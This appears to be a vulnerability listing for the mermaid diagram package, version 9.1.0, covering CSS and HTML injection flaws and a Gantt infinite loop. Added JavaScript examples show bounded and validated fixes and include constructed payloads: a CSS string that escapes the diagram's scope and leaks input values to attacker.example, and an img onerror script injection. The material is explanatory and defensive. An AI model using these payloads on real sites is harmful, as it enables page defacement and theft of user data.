mermaid@9.1.0

Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.

  • latest version

    11.16.0

  • first published

    11 years ago

  • latest version published

    6 hours ago

  • Direct Vulnerabilities

    Known vulnerabilities in the mermaid package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability (severity badge) / Vulnerable versions
    • M (medium severity): Arbitrary Code Injection

    mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown.

    Affected versions of this package are vulnerable to Arbitrary Code Injection (a CSS injection) due to improper sanitization of the configuration options fontFamily, themeCSS and altFontFamily. An attacker who controls these values can inject CSS that escapes the diagram's scoped selector and applies to the entire page, which can be used for page defacement or for exfiltration of DOM attribute values through crafted selectors.

    How to fix Arbitrary Code Injection?

    Upgrade mermaid to version 10.9.6, 11.15.0 or higher.

    Vulnerable versions: <10.9.6, or >=11.0.0-alpha.1 <11.15.0
    • M (medium severity): Arbitrary Code Injection

    mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown.

    Affected versions of this package are vulnerable to Arbitrary Code Injection (an HTML injection) due to improper sanitization of the classDef function in state diagrams. An attacker who can supply the diagram definition can inject arbitrary HTML into the rendered output, potentially leading to DOM manipulation and content spoofing.

    How to fix Arbitrary Code Injection?

    Upgrade mermaid to version 10.9.6, 11.15.0 or higher.

    Vulnerable versions: >=0.0.0 <10.9.6, or >=11.0.0-alpha.1 <11.15.0
    • M (medium severity): Arbitrary Code Injection

    mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown.

    Affected versions of this package are vulnerable to Arbitrary Code Injection (a CSS injection) due to improper sanitization of input passed to the addStyleClass function. An attacker who can supply crafted classDef values can inject arbitrary CSS into the rendered page, potentially leading to page defacement, user tracking through external resource loading, or exfiltration of DOM attribute values using attribute selectors.

    How to fix Arbitrary Code Injection?

    Upgrade mermaid to version 10.9.6, 11.15.0 or higher.

    Vulnerable versions: <10.9.6, or >=11.0.0-alpha.1 <11.15.0
    • M (medium severity): Infinite loop

    mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown.

    Affected versions of this package are vulnerable to Infinite loop in the rendering process of Gantt charts when the excludes attribute excludes all dates. An attacker can make the renderer loop forever (a denial of service for the rendering context) by supplying a chart definition whose excludes setting rules out every day of the week.

    How to fix Infinite loop?

    Upgrade mermaid to version 10.9.6, 11.15.0 or higher.

    Vulnerable versions: <10.9.6, or >=11.0.0-alpha.1 <11.15.0
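    The failure mode behind the Gantt advisory, as an added example that is not mermaid's own code: a simplified version of the "advance to the next non-excluded day" step a Gantt layout performs, showing why an excludes setting that rules out all seven weekdays hangs a day-by-day scan, and a bounded replacement that fails loudly instead. The function names, the toy excludes grammar (weekday names and the "weekends" shorthand only; the real directive also accepts dates) and the UTC-only date handling are assumptions of this example.

```javascript
// Added example, not mermaid's code. Toy Gantt date stepping to show the
// unbounded-loop shape and a bounded fix. UTC-only for determinism.

const DAY_NAMES = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'];

// Parse an excludes list such as "weekends" or "monday, tuesday" into a Set
// of lowercase weekday names. Only names and "weekends" are handled here.
function parseExcludes(spec) {
  const excluded = new Set();
  for (const tok of spec.split(',').map(s => s.trim().toLowerCase()).filter(Boolean)) {
    if (tok === 'weekends') { excluded.add('saturday'); excluded.add('sunday'); continue; }
    if (!DAY_NAMES.includes(tok)) throw new Error(`unknown excludes token: ${tok}`);
    excluded.add(tok);
  }
  return excluded;
}

function isExcluded(date, excluded) {
  return excluded.has(DAY_NAMES[date.getUTCDay()]);
}

// Vulnerable shape: loop until a non-excluded day turns up. When every
// weekday is excluded the condition is always true and the loop never
// exits. Kept only to show the bug; never call it with such an input.
function nextIncludedDayUnbounded(date, excluded) {
  const d = new Date(date.getTime());
  while (isExcluded(d, excluded)) d.setUTCDate(d.getUTCDate() + 1);
  return d;
}

// Hardened: the week is periodic, so if none of the next seven days is
// allowed, no later day can be either. Scan at most seven days and throw.
function nextIncludedDay(date, excluded) {
  const d = new Date(date.getTime());
  for (let i = 0; i < 7; i++) {
    if (!isExcluded(d, excluded)) return d;
    d.setUTCDate(d.getUTCDate() + 1);
  }
  throw new Error('excludes rules out every day of the week; nothing can be scheduled');
}

// Belt and braces: reject the configuration at parse time, before layout.
function validateExcludes(spec) {
  const excluded = parseExcludes(spec);
  if (excluded.size === DAY_NAMES.length) {
    throw new Error('excludes must leave at least one weekday available');
  }
  return excluded;
}

// Lay out a task of `days` working days starting on `start`, stepping over
// excluded days; returns the ISO date (YYYY-MM-DD) of its last working day.
function taskEnd(start, days, excluded) {
  let d = nextIncludedDay(start, excluded);
  for (let i = 1; i < days; i++) {
    d.setUTCDate(d.getUTCDate() + 1);
    d = nextIncludedDay(d, excluded);
  }
  return d.toISOString().slice(0, 10);
}
```

    The bound of seven is not a tunable timeout: it is the exact point at which the scan has provably visited every weekday, so the loop either finds a day or can be certain none exists.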
    • M (medium severity): Information Exposure

    mermaid is a package for generation of diagrams and flowcharts from text in a similar manner as markdown.

    Affected versions of this package are vulnerable to Information Exposure via CSS injection into the generated graph. Exploiting this vulnerability allows the attacker to change the styling of elements outside of the generated graph and potentially exfiltrate sensitive information using specially crafted CSS selectors.

    How to fix Information Exposure?

    Upgrade mermaid to version 9.1.3 or higher.

    Vulnerable versions: >=8.0.0 <9.1.3
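    The injection pattern shared by the three CSS advisories (fontFamily/themeCSS/altFontFamily, addStyleClass, and the older Information Exposure entry) and the HTML advisory (classDef in state diagrams), as an added example that is not mermaid's own code: a toy renderer that interpolates author-controlled strings into a per-diagram style rule and into label markup, the constructed payloads that escape the diagram's scope in each context, a helper that measures how many rules ended up outside the diagram's id, and the hardened forms (reject a fontFamily that is not a plain list of family names; HTML-escape text before it reaches markup). The diagram id, function names, payloads and the attacker host attacker.example are assumptions of this example, not details from the advisories.

```javascript
// Added example, not mermaid's code. Two interpolation contexts, the
// vulnerable shape and the hardened shape of each. Payloads are constructed.

// --- CSS context: a diagram-scoped style rule built from fontFamily -------

// Vulnerable shape: the value is pasted into the declaration verbatim.
function buildScopedCssUnsafe(diagramId, fontFamily) {
  return `#${diagramId} .label { font-family: ${fontFamily}; }`;
}

// Constructed payload: closes the declaration and the scoped rule, then adds
// page-wide rules: one defaces (hides the body), one leaks the first character
// of any input's value attribute through a request to an attacker host, and
// a dangling "#x {" swallows the renderer's own closing "; }".
const CSS_PAYLOAD =
  'sans-serif; } body { display: none; } ' +
  'input[value^="a"] { background: url(https://attacker.example/?v=a); } #x {';

// Naive rule splitter, used only to measure the damage: returns the selector
// of every rule that is not anchored under the diagram's id.
function rulesOutsideScope(css, diagramId) {
  const out = [];
  for (const chunk of css.split('}')) {
    if (!chunk.trim()) continue;
    const selector = chunk.split('{')[0].trim();
    if (!selector.startsWith(`#${diagramId}`)) out.push(selector);
  }
  return out;
}

// Hardened: a font-family is a comma-separated list of family names, so the
// value is validated against that shape and rejected otherwise, rather than
// "sanitised". Braces, semicolons, parentheses, slashes and angle brackets
// never belong in a legitimate value.
const FONT_FAMILY_RE = /^[A-Za-z0-9 ,'"\-]+$/;

function validateFontFamily(value) {
  if (typeof value !== 'string' || !FONT_FAMILY_RE.test(value)) {
    throw new Error('rejected fontFamily: not a plain list of family names');
  }
  return value;
}

function buildScopedCss(diagramId, fontFamily) {
  return `#${diagramId} .label { font-family: ${validateFontFamily(fontFamily)}; }`;
}

// --- HTML context: a diagram-derived string written into label markup ------

function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable shape: raw interpolation into the element.
function renderLabelUnsafe(text) {
  return `<div class="label">${text}</div>`;
}

// Hardened: escape for the HTML text context before interpolating.
function renderLabel(text) {
  return `<div class="label">${escapeHtml(text)}</div>`;
}

// Constructed payload for the HTML context.
const HTML_PAYLOAD = '<img src=x onerror=alert(document.domain)>';
```

    The point of rulesOutsideScope is to give a concrete check for the "escapes diagram scoping" claim: with the payload the unsafe builder emits three rules whose selectors sit outside the diagram's id, while the validated builder refuses the value before any CSS is produced. Rejecting rather than stripping matters because a stripping sanitiser has to anticipate every CSS tokeniser quirk; an allowlist only has to describe the one legitimate shape.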
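    A practitioner's first question on a page like this is whether a given installed version falls inside any of the listed ranges, which is not obvious by eye once a prerelease bound such as 11.0.0-alpha.1 is involved. The following is an added example, not Snyk's or mermaid's code: a small semver comparator and range evaluator covering only the comparator grammar these five ranges use, with the ranges transcribed from this page. Advisory titles are this example's shorthand for the entries above; treating a prerelease as an ordinary comparable version (rather than applying the stricter semver rule that prereleases only match ranges on the same major.minor.patch) is a deliberate, conservative simplification.

```javascript
// Added example, not Snyk's or mermaid's code. Minimal semver ordering and
// range evaluation for the ranges listed on this page.

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.\-]+))?$/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return {
    main: [Number(m[1]), Number(m[2]), Number(m[3])],
    pre: m[4] ? m[4].split('.') : null,   // prerelease identifiers, if any
  };
}

// Semver ordering: numeric major.minor.patch first; a prerelease sorts
// before the release it precedes; prerelease identifiers compare
// numerically when both are numeric, otherwise lexically, and a shorter
// identifier list sorts first.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a.main[i] !== b.main[i]) return a.main[i] < b.main[i] ? -1 : 1;
  }
  if (!a.pre && !b.pre) return 0;
  if (!a.pre) return 1;
  if (!b.pre) return -1;
  const n = Math.max(a.pre.length, b.pre.length);
  for (let i = 0; i < n; i++) {
    const x = a.pre[i], y = b.pre[i];
    if (x === undefined) return -1;
    if (y === undefined) return 1;
    const xn = /^\d+$/.test(x), yn = /^\d+$/.test(y);
    if (xn && yn) {
      if (Number(x) !== Number(y)) return Number(x) < Number(y) ? -1 : 1;
    } else if (xn !== yn) {
      return xn ? -1 : 1;           // numeric identifiers sort before alphanumeric
    } else if (x !== y) {
      return x < y ? -1 : 1;
    }
  }
  return 0;
}

// A range set is alternatives separated by "||"; each alternative is a
// space-separated list of comparators (>=, <=, >, <, =) that must all hold.
function satisfies(version, rangeSet) {
  const v = parseVersion(version);
  return rangeSet.split('||').some(alt =>
    alt.trim().split(/\s+/).every(cmp => {
      const m = /^(>=|<=|>|<|=)?(.+)$/.exec(cmp);
      const c = compareVersions(v, parseVersion(m[2]));
      switch (m[1] || '=') {
        case '>=': return c >= 0;
        case '<=': return c <= 0;
        case '>': return c > 0;
        case '<': return c < 0;
        default: return c === 0;
      }
    }));
}

// Ranges transcribed from this page; titles are shorthand for its entries.
const MERMAID_ADVISORIES = [
  { title: 'CSS injection via fontFamily/themeCSS/altFontFamily', range: '<10.9.6 || >=11.0.0-alpha.1 <11.15.0' },
  { title: 'HTML injection via classDef in state diagrams', range: '>=0.0.0 <10.9.6 || >=11.0.0-alpha.1 <11.15.0' },
  { title: 'CSS injection via addStyleClass', range: '<10.9.6 || >=11.0.0-alpha.1 <11.15.0' },
  { title: 'Gantt infinite loop when excludes rules out every day', range: '<10.9.6 || >=11.0.0-alpha.1 <11.15.0' },
  { title: 'Information exposure via CSS injection', range: '>=8.0.0 <9.1.3' },
];

// Titles of every advisory whose range contains the given version.
function affectingAdvisories(version) {
  return MERMAID_ADVISORIES.filter(a => satisfies(version, a.range)).map(a => a.title);
}
```

    Running it against 9.1.0, the version this page is for, returns all five entries; 10.9.6 and 11.15.0 return none, and 11.0.0-alpha.0 returns none while 11.0.0-alpha.1 returns the four newer entries, which is the prerelease boundary the ranges encode.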